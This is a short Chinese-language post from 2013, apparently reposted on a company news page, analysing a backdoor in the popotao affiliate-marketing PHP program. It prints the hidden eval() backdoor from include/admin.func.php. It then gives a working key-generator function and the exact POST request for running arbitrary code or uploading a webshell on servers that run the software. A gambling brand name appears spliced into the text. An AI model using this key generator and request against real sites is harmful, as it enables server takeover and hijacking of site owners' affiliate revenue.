• News
    新闻中心
  • 您现在的位置: 首页 > 关于我们 > 新闻中心

  • 泡泡淘(popotao)淘客程序官方后门分析

    发表时间:2013-02-17

    泡泡淘20130204的版本

    后门代码文件在include/admin.func.php最下面。 
     
    if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )  
     
    {  
     
    $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );  
     
    if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )  
     
    {  
     
    eval( $_POST['_HkBs'] );  
     
    }  
     
    exit( );  
     
     
    利用原理:提交一个字符串,然后通过了域名和时间的验证,顺利到达eval这里。
     
    vwin德赢 app观点:这就是一句话后门。有这句代码,控制你们网站的服务器,真的没什么问题,把PID什么的改掉,你的网站就帮别人赚钱吧。 
     
    function getfuckkey($domain = ''){  
     
    $time = 'K_'.date("Y_m_d");  
     
    //$domain = $_SERVER['HTTP_HOST'];  
     
    if ($domain) {  
     
    $key = $domain.'|'.$time;  
     
    $key2 = base64_encode(~$key);  
     
    $key3 = strrev($key2);  
     
    $k1 = substr( $key3, 0, 5 );  
     
    $k2 = substr( $key3, 5, -3 );  
     
    $k3 = substr( $key3, -3 );  
     
    $key4 = $k3.$k1.$k2;  
     
    return $key4;  
     
    } else {  
     
    return '';  
     
    }  
     
    }  
     
    echo getfuckkey('xiaosajie.com'); 
     
    这样可以得到字符串,然后post方式,注意必须POST方式提交,提交到include/admin.func.php?_MDFK={key}&_HkBs=phpinfo() 
     
    就可以查看phpinfo();或者直接上传大马。。。